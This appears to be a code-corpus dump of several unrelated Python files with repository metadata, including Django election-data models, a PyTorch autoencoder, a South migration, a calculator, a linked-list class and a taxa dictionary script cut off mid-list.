IsEarlyVoting = models.CharField(max_length = 50, blank = True, null = True, default = 'false')
    LatLng = models.ManyToManyField(LatLng, db_column = 'LatLng', max_length = 50, blank = True)
Name = models.CharField(blank = True, null = True, max_length = 1000)
PhotoUri = models.URLField(blank = True, null = True)
def __str__(self):
return(self.Name)
class OrderedContest(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContestId = models.ForeignKey(CandidateContest, db_column = 'ContestId', on_delete = models.CASCADE, max_length = 50, blank = True, null = True)
OrderedBallotSelectionIds = models.ManyToManyField(CandidateSelection, blank = True, max_length = 1000)
class BallotStyle(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ImageUri = models.URLField(blank = True, null = True)
OrderedContestIds = models.ManyToManyField(OrderedContest, blank = True, max_length = 1000)
PartyIds = models.ManyToManyField(Party, blank = True, max_length = 1000)
class Precinct(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
BallotStyleId = models.ForeignKey(BallotStyle, db_column = 'BallotStyleId', on_delete = models.CASCADE, max_length = 50, blank = True, null = True)
ElectoralDistrictIds = models.ManyToManyField(ElectoralDistrict, max_length = 1000, blank = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
IsMailOnly = models.CharField(max_length = 50, blank = True, null = True)
LocalityId = models.ForeignKey(Locality, db_column = 'LocalityId', on_delete = models.CASCADE, max_length = 50)
Name = models.CharField(max_length = 200, blank = True, null = True)
Number = models.CharField(max_length = 50, blank = True, null = True)
PollingLocationIds = models.ManyToManyField(PollingLocation,max_length = 1000, blank = True)
PrecinctSplitName = models.CharField(max_length = 50, blank = True, null = True)
Ward = models.CharField(max_length = 50, blank = True, null = True)
def __str__(self):
return("{} ({})".format(self.Name, self.LocalityId.Name))
class State(models.Model):
id = models.CharField(primary_key = True, max_length = 50, default = "st1")
ElectionAdministrationId = models.ForeignKey(ElectionAdministration, on_delete = models.CASCADE, db_column = 'ElectionAdministrationId', blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
Name = models.CharField(max_length = 50, blank = True, null = True)
PollingLocationIds = models.ManyToManyField(PollingLocation, max_length = 1000, blank = True)
def __str__(self):
return(self.Name)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
class StreetSegment(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
AddressDirection = models.CharField(max_length = 50, blank = True, null = True)
City = models.CharField(max_length = 50, blank = True, null = True)
IncludesAllAddresses = models.CharField(max_length = 50, blank = True, null = True)
IncludesAllStreets = models.CharField(max_length = 50, blank = True, null = True)
OddEvenBoth = models.CharField(max_length = 50, blank = True, null = True)
PrecinctId = models.ForeignKey(Precinct, on_delete = models.CASCADE, db_column = 'PrecinctId')
StartHouseNumber = models.CharField(max_length = 50, blank = True, null = True)
EndHouseNumber = models.CharField(max_length = 50, blank = True, null = True)
HouseNumberPrefix = models.CharField(max_length = 50, blank = True, null = True)
HouseNumberSuffix = models.CharField(max_length = 50, blank = True, null = True)
State = models.CharField(max_length = 50, blank = True, null = True)
StreetDirection = models.CharField(max_length = 50, blank = True, null = True)
StreetName = models.CharField(max_length = 50, blank = True, null = True)
StreetSuffix = models.CharField(max_length = 50, blank = True, null = True)
UnitNumber = models.CharField(max_length = 500, blank = True, null = True)
Zip = models.CharField(max_length = 50, blank = True, null = True)
class Error(models.Model):
id_error = models.CharField(max_length = 50, blank = True, null = True)
error_object = models.CharField(max_length = 50, blank = True, null = True)
error_message = models.CharField(max_length = 500, blank = True, null = True)
|
[
"franklin@democracy.works"
] |
franklin@democracy.works
|
5dbd16bad92c13444eb77d53b650fba51d099460
|
7f8cebd9315129bcdb7ef220dc449cda26a19ce4
|
/models/aetanh.py
|
bcff65d94ee5b2f960314125e4beb4f15db6e754
|
[] |
no_license
|
KaiqianZhang/dpcca_v8
|
75477b1768905b6c41838c8da9ff77fba13b5a45
|
1b65fc0c3ec6b182907ba070e859c1d92fc98942
|
refs/heads/master
| 2020-08-30T09:32:58.485684
| 2019-11-11T17:34:55
| 2019-11-11T17:34:55
| 218,334,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,639
|
py
|
"""=============================================================================
Autoencoder.
============================================================================="""
import numpy as np
from torch import nn
# ------------------------------------------------------------------------------
class AETanH(nn.Module):
def __name__(self):
return 'AE'
# ------------------------------------------------------------------------------
def __init__(self, cfg):
super(AETanH, self).__init__()
assert cfg.GENE_EMBED_DIM < 12
self.nc = cfg.N_CHANNELS
self.w = cfg.IMG_SIZE
self.input_dim = cfg.N_GENES
self.encoder = nn.Sequential(
nn.Linear(self.input_dim, 128),
nn.Tanh(),
nn.Linear(128, 64),
nn.Tanh(),
nn.Linear(64, cfg.GENE_EMBED_DIM)
)
self.decoder = nn.Sequential(
nn.Linear(cfg.GENE_EMBED_DIM, 64),
nn.Tanh(),
nn.Linear(64, 128),
nn.Tanh(),
nn.Linear(128, self.input_dim)
)
# ------------------------------------------------------------------------------
def encode(self, x):
x = x.view(-1, np.prod(x.shape[1:]))
return self.encoder(x)
# ------------------------------------------------------------------------------
def decode(self, z):
x = self.decoder(z)
return x.view(-1, self.input_dim)
# ------------------------------------------------------------------------------
def forward(self, x):
x = self.encode(x)
x = self.decode(x)
return x
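# Minimal usage sketch (assumes a `cfg` object exposing N_CHANNELS, IMG_SIZE,
# N_GENES and GENE_EMBED_DIM, as referenced in __init__ above):
#   model = AETanH(cfg)
#   x_hat = model(x)                                # x: (batch, cfg.N_GENES)
#   loss = nn.MSELoss()(x_hat, x.view(x_hat.shape))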
|
[
"ggundersen@gmail.com"
] |
ggundersen@gmail.com
|
5824f026706f22fed9333ce3b0f3cdc2674fb5cf
|
afb7d4d6013b6a9022d707d5835a3dd578214b2e
|
/Bite_172.py
|
d38f7db655c51e87afd6b54e249df6347f9a2efa
|
[] |
no_license
|
JB0925/Bites
|
86f0bd49d8b53376257c14df280ae0a9643139a2
|
f884ce4ffd7ce39afcea5b86a80cec14c607a4f0
|
refs/heads/master
| 2023-03-29T21:48:42.849729
| 2021-03-29T01:37:48
| 2021-03-29T01:37:48
| 316,419,350
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from functools import partial
# create 2 partials:
# - 'rounder_int' rounds to int (0 places)
# - 'rounder_detailed' rounds to 4 places
def round_to_int(num, places):
return round(num, places)
rounder_int = partial(round_to_int, places=0)
rounder_detailed = partial(round_to_int, places=4)
print(rounder_detailed(10.4232567))
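# rounder_int keeps the partial's places=0 binding, so the same call site
# yields an integer-valued float:
print(rounder_int(10.4232567))  # 10.0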
|
[
"jbrink0925@gmail.com"
] |
jbrink0925@gmail.com
|
32c853e551c807d8e0690e5eef0d6d8be54c3e94
|
da6bf15899bff60785b4659277a94c043c669f8f
|
/morse.py
|
198d3b555f073e1525d3fc5bef7806a92a91b463
|
[] |
no_license
|
sandraonne/Python2
|
97aabe49b16043e3420dda1f49a18680b7268b01
|
7a07a02282afa1bb14390edf9082ee7da7200c6e
|
refs/heads/master
| 2021-01-24T00:33:29.414648
| 2018-02-24T19:02:40
| 2018-02-24T19:02:40
| 122,771,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
# Write a program that, on startup, greets the user both in plain
# language and in Morse code, then lets the user enter words and
# converts them character by character into the Morse alphabet
# (adding a space after each symbol). The dictionary may not contain
# every possible character, so each symbol must be checked for
# presence in the dictionary. Only lowercase letters are used for the
# check. Likewise, instead of õ, ä, ü and ö we use o, a and u.
tahestik = {"a":".-", "b":"-...", "c":"-.-.", "d":"-..", "e":".", "f":"..-.", "g":"--.", "h":"....", "i":"..",
"j":".---", "k":"-.-", "l":".-..", "m":"--", "n":"-.", "o":"---", "p":".--.", "q":"--.-", "r":".-.",
"s":"...", "t":"-", "u":"..-", "v":"...-", "w":".--", "x":"-..-", "y":"-.--", "z":"--..", " ":".......",
"ä":".-", "õ":"---", "ö":"---", "ü":"..-"}
tervitus = "Tervist"
print("Tervist")
for taht in tervitus:
for voti in tahestik:
if (taht.lower() == voti):
print(tahestik[voti])
sona = input("Enter a word or sentence: ")
for taht in sona:
for voti in tahestik:
if (taht.lower() == voti):
print(tahestik[voti])
    # else:
    #     print("No such symbol exists in the Morse alphabet")
|
[
"sandra.onne@khk.ee"
] |
sandra.onne@khk.ee
|
daaced6e4d0072db31cb545558da38494a427fbc
|
93d995cd40ff724570d904956564f5be00f2fbb7
|
/class_code/Tuesday/singly_linked_list.py
|
cd80d4481a1ca27165765fbf02938b47e380aa89
|
[] |
no_license
|
HKang42/Data-Structures
|
fe37f9b3388bb65c91e44617eb57c8e5ecea21be
|
0df5d658a9b752ba7e113ec60a7666739066eda1
|
refs/heads/master
| 2022-11-08T19:25:31.359372
| 2020-06-12T06:57:44
| 2020-06-12T06:57:44
| 271,117,643
| 0
| 0
| null | 2020-06-09T21:54:26
| 2020-06-09T21:54:26
| null |
UTF-8
|
Python
| false
| false
| 5,068
|
py
|
class Node:
def __init__(self, value, next=None):
self.value = value
self.next_node = next
def get_value(self):
# returns the node's data
return self.value
def get_next(self):
# returns the thing pointed at by this node's `next` reference
return self.next_node
def set_next(self, new_next):
# sets this node's `next` reference to `new_next`
self.next_node = new_next
class LinkedList:
def __init__(self):
# the first Node in the LinkedList
self.head = None
# the last Node in the LinkedList
self.tail = None
'''
Adds `data` to the end of the LinkedList
O(1) because this operation doesn't depend on the size of the linked list
'''
def add_to_tail(self, data):
# wrap the `data` in a Node instance
new_node = Node(data)
# what about the empty case, when both self.head = None and self.tail = None?
if not self.head and not self.tail:
# list is empty
# update both head and tail to point to the new node
self.head = new_node
self.tail = new_node
# non-empty linked list case
else:
# call set_next with the new_node on the current tail node
self.tail.set_next(new_node)
# update self.tail to point to the new last Node in the linked list
self.tail = new_node
'''
Removes the Node that `self.tail` is referring to and returns the
Node's data
What's the runtime of this method?
'''
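    # Answer: O(n). Without back-pointers we must walk from the head to find
    # the node just before the tail.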
def remove_tail(self):
# if the linked list is empty
if self.tail is None:
return None
# save the tail Node's data
data = self.tail.get_value()
# both head and tail refer to the same Node
# there's only one Node in the linked list
if self.head is self.tail:
# set both to be None
self.head = None
self.tail = None
else:
# in order to update `self.tail` to point to the
# the Node _before_ the tail, we need to traverse
# the whole linked list starting from the head,
# because we cannot move backwards from any one
# Node, so we have to start from the beginning
current = self.head
# traverse until we get to the Node right
# before the tail Node
while current.get_next() != self.tail:
current = current.get_next()
# `current` is now pointing at the Node right
# before the tail Node
            # sever the link to the old tail and make `current` the new tail
            current.set_next(None)
            self.tail = current
return data
'''
Removes the Node that `self.head` is referring to and returns the
Node's data
'''
def remove_head(self):
if self.head is None:
return None
# save the head Node's data
data = self.head.get_value()
# both head and tail refer to the same Node
# there's only one Node in the linked list
if self.head is self.tail:
# set both to be None
self.head = None
self.tail = None
else:
# we have more than one Node in the linked list
# delete the head Node
# update `self.head` to refer to the Node after the Node we just deleted
self.head = self.head.get_next()
return data
'''
Traverses the linked list and returns a boolean indicating whether the
specified `data` is in the linked list.
What's the runtime for this method?
'''
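    # Answer: O(n) in the worst case, since the loop may visit every node once.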
def contains(self, data):
# an empty linked list can't contain what we're looking for
if not self.head:
return False
# get a reference to the first Node in the linked list
# we update what this Node points to as we traverse the linked list
current = self.head
# traverse the linked list so long as `current` is referring
# to a Node
while current is not None:
# check if the Node that `current` is pointing at is holding
# the data we're looking for
if current.get_value() == data:
return True
# update our `current` pointer to point to the next Node in the linked list
current = current.get_next()
# we checked the whole linked list and didn't find the data
return False
'''
Traverses the linked list, fetching the max value in the linked list
What is the runtime of this method?
'''
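    # Answer: O(n); each node's value is compared exactly once.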
def get_max(self):
if self.head is None:
return None
max_so_far = self.head.get_value()
current = self.head.get_next()
while current is not None:
if current.get_value() > max_so_far:
max_so_far = current.get_value()
current = current.get_next()
return max_so_far
|
[
"h.kang.q@gmail.com"
] |
h.kang.q@gmail.com
|
12d8dc00bbdec801fde535c2fb1573d4d8be79cc
|
d8d43bfb5ac50e88bf26ef59c9b3881b3d9686c6
|
/codecamp_project/campsessions/migrations/0004_auto__add_time__chg_field_session_time__add_index_session_time.py
|
b58f51a27c6f0b4ba8824297d6a03433b78bf199
|
[] |
no_license
|
harmstyler/codecamp_project
|
929e48feae87c423c2670a46cf952bfb86117f15
|
8f367737d67b739fb1b11d9d214fbd910ccc5dfa
|
refs/heads/master
| 2021-01-19T13:50:39.470072
| 2013-08-04T20:46:36
| 2013-08-04T20:46:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,108
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Time'
db.create_table(u'campsessions_time', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('time', self.gf('django.db.models.fields.TimeField')()),
))
db.send_create_signal(u'campsessions', ['Time'])
# Renaming column for 'Session.time' to match new field type.
db.rename_column(u'campsessions_session', 'time', 'time_id')
# Changing field 'Session.time'
db.alter_column(u'campsessions_session', 'time_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['campsessions.Time'], null=True))
# Adding index on 'Session', fields ['time']
db.create_index(u'campsessions_session', ['time_id'])
def backwards(self, orm):
# Removing index on 'Session', fields ['time']
db.delete_index(u'campsessions_session', ['time_id'])
# Deleting model 'Time'
db.delete_table(u'campsessions_time')
# Renaming column for 'Session.time' to match new field type.
db.rename_column(u'campsessions_session', 'time_id', 'time')
# Changing field 'Session.time'
db.alter_column(u'campsessions_session', 'time', self.gf('django.db.models.fields.TimeField')(default=0))
models = {
u'campsessions.room': {
'Meta': {'ordering': "['name']", 'object_name': 'Room'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
u'campsessions.session': {
'Meta': {'ordering': "['title']", 'object_name': 'Session'},
'abstract': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['campsessions.Room']", 'null': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'speakers': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['speakers.Speaker']", 'symmetrical': 'False'}),
'time': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['campsessions.Time']", 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
u'campsessions.time': {
'Meta': {'ordering': "['time']", 'object_name': 'Time'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'time': ('django.db.models.fields.TimeField', [], {})
},
u'speakers.speaker': {
'Meta': {'ordering': "['last_name']", 'object_name': 'Speaker'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['campsessions']
|
[
"tyler.harms@gmail.com"
] |
tyler.harms@gmail.com
|
c48fcc8440c694ee49e258c7188c7d92ea4424b6
|
b367dfbc07fdfcc55d1d43839646c8b91eb18b2f
|
/simple calculater - Copy.py
|
f7f823e9521620e6c148401980e45404c32040c3
|
[] |
no_license
|
manpreetSingh1308/Python-programs
|
cd5c6baf7fd2662c0cad68a89dc9990e91ca0c79
|
fb012c41fcbe011533eaa51886d986272376e9f6
|
refs/heads/main
| 2023-08-19T23:45:52.080045
| 2021-10-30T20:07:24
| 2021-10-30T20:07:24
| 422,979,639
| 0
| 0
| null | 2021-10-30T20:04:49
| 2021-10-30T20:04:49
| null |
UTF-8
|
Python
| false
| false
| 1,400
|
py
|
# Program make a simple calculator
# This function adds two numbers
def add(x, y):
return x + y
# This function subtracts two numbers
def subtract(x, y):
return x - y
# This function multiplies two numbers
def multiply(x, y):
return x * y
# This function divides two numbers
def divide(x, y):
return x / y
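# Note: divide(x, 0) raises ZeroDivisionError; the menu loop below does not
# guard against a zero divisor.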
print("Select operation.")
print("1.Add")
print("2.Subtract")
print("3.Multiply")
print("4.Divide")
while True:
# take input from the user
choice = input("Enter choice(1/2/3/4): ")
# check if choice is one of the four options
if choice in ('1', '2', '3', '4'):
num1 = float(input("Enter first number: "))
num2 = float(input("Enter second number: "))
if choice == '1':
print(num1, "+", num2, "=", add(num1, num2))
elif choice == '2':
print(num1, "-", num2, "=", subtract(num1, num2))
elif choice == '3':
print(num1, "*", num2, "=", multiply(num1, num2))
elif choice == '4':
print(num1, "/", num2, "=", divide(num1, num2))
# check if user wants another calculation
# break the while loop if answer is no
next_calculation = input("Let's do next calculation? (yes/no): ")
if next_calculation == "no":
break
else:
print("Invalid Input")
|
[
"noreply@github.com"
] |
manpreetSingh1308.noreply@github.com
|
617d16ab2f1dfad658507e965879e41e4d3c041c
|
7aefd6394563a7418fec84f87a7b22ba2e1b00e9
|
/build/lib/hetsar/utils.py
|
48508f90b21c245e5019dd0c3c3c9d7eb6c04619
|
[
"BSD-3-Clause"
] |
permissive
|
ida-j/hetsar
|
817d8f779eaefe40a34824945b743f7596049460
|
198b18c9f27d6e8be94f688eb2bd404a50ac2824
|
refs/heads/main
| 2023-06-07T23:10:44.782865
| 2021-06-21T16:15:01
| 2021-06-21T16:15:01
| 332,352,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,972
|
py
|
import numpy as np
import pandas as pd
def fn_significance_stars(zscore):
if np.abs(zscore)>=2.58:
return '***'
elif np.abs(zscore)<2.58 and np.abs(zscore)>=1.96:
return '**'
elif np.abs(zscore)<1.96 and np.abs(zscore)>=1.65:
return '*'
else:
return ''
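# e.g. fn_significance_stars(3.0) -> '***', 2.0 -> '**', 1.7 -> '*', 1.0 -> ''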
def fn_add_lags(df,idvar,timevar,varlist,lagorders):
    """
    Append lagged copies of the columns in `varlist` to a panel DataFrame.

    :param df: panel DataFrame
    :param idvar: name of the cross-section identifier column
    :param timevar: name of the time-period column
    :param varlist: list of column names to lag
    :param lagorders: iterable of lag orders to add, e.g. [1, 2]
    :return: DataFrame with '<var>_l<lag>' columns appended and rows with
        missing lags dropped
    """
    dfl = df.set_index([idvar,timevar])
    for lag in lagorders:
        df_lagged = dfl.groupby(level = [0])[varlist].shift(lag).reset_index().\
            rename(columns = {v: f'{v}_l{lag}' for v in varlist})
        df = df.merge(df_lagged, on = [idvar,timevar]).dropna()
    return df.reset_index(drop = True)
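# Both helpers below invert a 2x2 block matrix H = [[A, B], [C, D]] via the
# Schur complement: with E = D - C A^{-1} B,
#   H^{-1} = [[A^{-1} + A^{-1} B E^{-1} C A^{-1},  -A^{-1} B E^{-1}],
#             [-E^{-1} C A^{-1},                     E^{-1}        ]]
# fn_inv_partitioned_a takes A^{-1} as given; fn_inv_partitioned_b is the
# symmetric variant that takes D^{-1} as given.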
def fn_inv_partitioned_a(invA,m_B,m_C,m_D):
    m_C_invA = m_C@invA
    m_E = m_D - m_C_invA@m_B
    invE = np.linalg.inv(m_E)
    m_invA_B_invE = invA@m_B@invE
    invH11 = invA + (m_invA_B_invE @ m_C_invA)
    invH12 = -m_invA_B_invE
    invH21 = -invE @ m_C_invA
    invH22 = invE
    row1 = np.concatenate((invH11, invH12),axis = 1)
    row2 = np.concatenate((invH21, invH22),axis = 1)
    invH = np.concatenate((row1,row2),axis = 0)
    return invH
def fn_inv_partitioned_b(m_A,m_B,m_C,invD):
    m_B_invD = m_B @ invD
    m_F = m_A - (m_B_invD @ m_C)
    invF = np.linalg.inv(m_F)
    m_invD_C_invF = invD @ m_C @ invF
    invH11 = invF
    invH12 = -invF @ m_B_invD
    invH21 = -m_invD_C_invF
    invH22 = invD + (m_invD_C_invF @ m_B_invD)
    row1 = np.concatenate((invH11, invH12),axis = 1)
    row2 = np.concatenate((invH21, invH22),axis = 1)
    invH = np.concatenate((row1,row2),axis = 0)
    return invH
def fn_varml_sandwich_Npsi_NKbeta_Nsgmsq(v_theta,m_y,m_ys,a_x,m_W):
N,T,K = a_x.shape
v_psi = v_theta[:N,0].reshape(N,1)
v_beta = v_theta[N:(N+K*N),0].reshape(N*K,1)
v_sgmsq = v_theta[(N+K*N):,0].reshape(N,1)
# m_beta = v_beta.reshape([N,K], order = 'F')
m_beta = v_beta.reshape([N,K], order = 'C')
v_sgm4h = v_sgmsq**2
v_sgm6h = v_sgmsq**3
a_x2 = np.transpose(a_x,(0,2,1))
m_beta2 = m_beta[:,:,np.newaxis]
m_beta_x = m_beta2*a_x2
m_beta_x2 = np.transpose(m_beta_x,(0,2,1))
m_beta_x_sum = np.sum(m_beta_x2,2)
# residuals
m_eps = m_y-v_psi*m_ys-m_beta_x_sum
m_epssq = m_eps**2
v_ssr = np.sum(m_eps**2,1).reshape(N,1)
sssr = np.sum(v_ssr/v_sgmsq)
m_Psi = v_psi * np.identity(len(v_psi))
m_A = np.identity(N)-m_Psi@m_W
det_mA= np.linalg.det(m_A)
if det_mA<=0:
print('Error: determinant(A)<=0!')
m_Q = m_W@np.linalg.inv(m_A)
m_H11 = m_Q*np.transpose(m_Q) + np.diag(np.sum(m_ys**2,1))/(T*v_sgmsq)
m_H13a = np.sum(m_ys*m_eps,1).reshape(N,1)/(T*v_sgm4h)
m_H13 = m_H13a*np.identity(len(m_H13a))
m_H33a = -(0.5/v_sgm4h)+(v_ssr/v_sgm6h)/T
m_H33 = m_H33a*np.identity(len(m_H33a))
m_H12 = np.zeros([N,N*K])
invH22 = np.zeros([N*K,N*K])
m_H23 = np.zeros([N*K,N])
for i in range(N):
ind = (i * K + 1,(i+1) * K)
v_ysi = m_ys[i,:].reshape(T,1)
m_Xi = a_x[i,:,:] # TxK
v_epsi = m_eps[i,:].reshape(T,1)
sgmsqi = v_sgmsq[i,0]
sgm4hi = v_sgm4h[i,0]
m_H12[i,ind[0]-1:ind[1]] = np.transpose(v_ysi)@m_Xi/sgmsqi/T
invH22[ind[0]-1:ind[1],ind[0]-1:ind[1]] = np.linalg.inv(np.transpose(m_Xi)@m_Xi)*sgmsqi*T
m_H23[ind[0]-1:ind[1],i] = np.transpose(np.transpose(m_Xi)@v_epsi/sgm4hi/T)
m_Z11 = m_H11;
m_Z12 = np.concatenate((m_H12,m_H13),axis = 1)
invZ22 = fn_inv_partitioned_a(invH22,m_H23,np.transpose(m_H23),m_H33)
invH = fn_inv_partitioned_b(m_Z11, m_Z12, np.transpose(m_Z12), invZ22)
# J matrix
v_q = np.diag(m_Q).reshape(N,1)
m_dlogft_dvpsi = (m_ys*m_eps/v_sgmsq) - v_q
v_dlogft_dvsgmsq = (m_epssq/v_sgm4h/2) - 0.5/v_sgmsq
a_dlogft_dvbeta = m_eps.reshape(N,T,1)*a_x/v_sgmsq.reshape(N,1,1)
m_dlogft_dvbeta = np.zeros([K*N,T])
for i in range(N):
ind = (i * K + 1,(i+1) * K)
m_dlogft_dvbeta[ind[0]-1:ind[1],:] = np.transpose(a_dlogft_dvbeta[i,:,:])
m_dlogft_dvtheta = np.concatenate((m_dlogft_dvpsi,m_dlogft_dvbeta,v_dlogft_dvsgmsq))
m_J = (m_dlogft_dvtheta@np.transpose(m_dlogft_dvtheta))/T
# standard variance
v_var0 = np.diag(invH)/T
v_var = v_var0.reshape(len(v_var0),1)
m_variance = np.zeros([N,K+2])
for i in [0,K+1]:
m_variance[:,i] = v_var[i*N:(i+1)*N,0]
for k_val in range(K):
i = 1
m_variance[:,i+k_val] = v_var[[j+k_val for j in range(i*N+i-1,(i+K)*N+i-1,K)],0]
# sandwich variance
m_invH_J_invH = invH@m_J@invH
v_var0 = np.diag(m_invH_J_invH)/T
v_var = v_var0.reshape(len(v_var0),1)
m_sandwich = np.zeros([N,K+2])
for i in [0,K+1]:
m_sandwich[:,i] = v_var[i*N:(i+1)*N,0]
for k_val in range(K):
i = 1
m_sandwich[:,i+k_val] = v_var[[j+k_val for j in range(i*N+i-1,(i+K)*N+i-1,K)],0]
return (m_variance,m_sandwich)
def format_output(res,N,T,K,var,var_sand,dep_var,exog_labels,id_var):
res_psi = res.x[:N].reshape([N,1])
res_beta = res.x[N:(K+1)*N].reshape([N,K],order = 'C')
res_sigma = res.x[(K+1)*N:].reshape([N,1])
data_r = np.concatenate([res_psi,res_beta,res_sigma],axis = 1)
dim_exog = res_beta.shape[1]
    if exog_labels is None:
exog_labels = ['x{}'.format(i) for i in range(dim_exog)]
else:
if len(exog_labels)!=dim_exog:
print('Wrong number of labels for exogenous covariates, using default labels')
exog_labels = ['x{}'.format(i) for i in range(dim_exog)]
colnames = [f'W{dep_var}'] + exog_labels + ['sgmsq']
df_r = pd.DataFrame(data=data_r,columns = colnames)
for i in range(len(colnames)):
df_r['var_{}'.format(colnames[i])] = var[:,i]
df_r['var_sandw_{}'.format(colnames[i])] = var_sand[:,i]
df_r.insert(0, id_var, [i for i in range(1,N+1)])
return df_r
# mean-group estimator
def fn_mg_est(df_theta,var_hat,group):
countN = df_theta[[group,var_hat]].groupby(group).count().reset_index().rename(columns = {var_hat:'N'})
df_mg = df_theta[[var_hat,group]].groupby(group).mean().reset_index().rename(columns = {var_hat:'var_hat_mg'})
df_est2 = df_theta[[var_hat,group]].merge(df_mg[[group,'var_hat_mg']],on = group,how = 'left').\
rename(columns = {var_hat:'var_hat'})
df_est2['sq_er'] = (df_est2.var_hat-df_est2.var_hat_mg)**2
df_sgm = df_est2[[group,'sq_er']].groupby(group).sum().reset_index().\
merge(countN,on = group)
df_sgm['s_{}_mg'.format(var_hat)] = np.sqrt(df_sgm.sq_er/(df_sgm.N*(df_sgm.N-1)))
return df_sgm.merge(df_mg[['var_hat_mg',group]],on = group).\
rename(columns = {'var_hat_mg':'{}_mg'.format(var_hat)})[[group,'s_{}_mg'.format(var_hat),'{}_mg'.format(var_hat)]]
def fn_mg_bias_rmse_size(df_results,var_hat,var0,N,cval = 1.96):
df_est = df_results[[var_hat,'r','N']].rename(columns = {var_hat:'var_hat'})
df_est['var0'] = var0
res_mean = df_est[['var_hat','var0','r']].groupby('r').mean().reset_index()
res_mean['bias'] = res_mean['var_hat']-res_mean['var0']
res_mean = res_mean.rename(columns = {'var_hat':'var_hat_mg'})
res_mean['rmse'] = (res_mean['var_hat_mg']-res_mean['var0'])**2
bias_r = res_mean.mean().bias
rmse_r = (res_mean.mean().rmse)**(1/2)
df_est2 = df_est.merge(res_mean[['r','var_hat_mg']],on = 'r',how = 'left')
df_est2['sq_er'] = (df_est2.var_hat-df_est2.var_hat_mg)**2
df_sgm = df_est2[['r','sq_er']].groupby('r').sum().reset_index()
df_sgm['s2_r'] = df_sgm.sq_er/(N*(N-1))
df_sgm['s'] = np.sqrt(df_sgm.s2_r)
df_sgm2 = df_sgm.merge(res_mean[['r','var_hat_mg']],on = 'r',how = 'left')
df_sgm2['var0'] = var0
df_sgm2['t']= (df_sgm2.var_hat_mg-df_sgm2.var0)/df_sgm2.s
df_sgm2['size'] = 1*(np.abs(df_sgm2.t)>cval)
size_r = df_sgm2.mean()['size']
return (bias_r,rmse_r,size_r)
|
[
"ida.b.johnsson@gmail.com"
] |
ida.b.johnsson@gmail.com
|
1471e72b37bcd808725dc8eefdf97b634cc957dc
|
34bfac68474bea25a02adfb255ec817a080207ad
|
/code/test.py
|
b52cbd6071a9f998cf258ef7dad6aaf9808f137f
|
[
"Unlicense"
] |
permissive
|
telavivmakers/geek_code
|
574d3aec793ba1688b53b3c4b4ee8ed7c1ee20bc
|
a4fce2dc0d569c72bfa820c7c7a8d95097818ca2
|
refs/heads/master
| 2023-02-23T04:41:38.580022
| 2023-02-18T18:33:12
| 2023-02-18T18:33:12
| 216,117,542
| 29
| 4
|
Unlicense
| 2023-02-18T18:33:13
| 2019-10-18T22:44:48
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
import geek_decode
meaning,remaining = geek_decode.parse_geekcode(' GS blabla GDS')
print(meaning, remaining)
|
[
"noreply@github.com"
] |
telavivmakers.noreply@github.com
|
a0d18993b6906afca87c3392a769e58c0dd83185
|
24f9f3ce945c84d6afe32870e320a1d5c9d896ac
|
/Week2/Code/dictionary.py
|
605830369ca42ea1462fd5787dd45982740e75ba
|
[] |
no_license
|
acse-yq3018/CMEECourseWork
|
64c529db506a65e43cfc656726d66769b60742cd
|
8f2ae373f21f39d72780e64d74f27db1ae3c9c43
|
refs/heads/master
| 2021-10-22T11:33:40.573899
| 2019-03-10T11:50:16
| 2019-03-10T11:50:16
| 151,982,957
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
#!/usr/bin/env python3
"""Use dictionary to classify taxa"""
__appname__ = 'dictionary.py'
__author__ = 'Yuxin Qin (yq3018@imperial.ac.uk)'
__version__ = '0.0.1'
##################################################
taxa = [ ('Myotis lucifugus','Chiroptera'),
('Gerbillus henleyi','Rodentia',),
('Peromyscus crinitus', 'Rodentia'),
('Mus domesticus', 'Rodentia'),
('Cleithrionomys rutilus', 'Rodentia'),
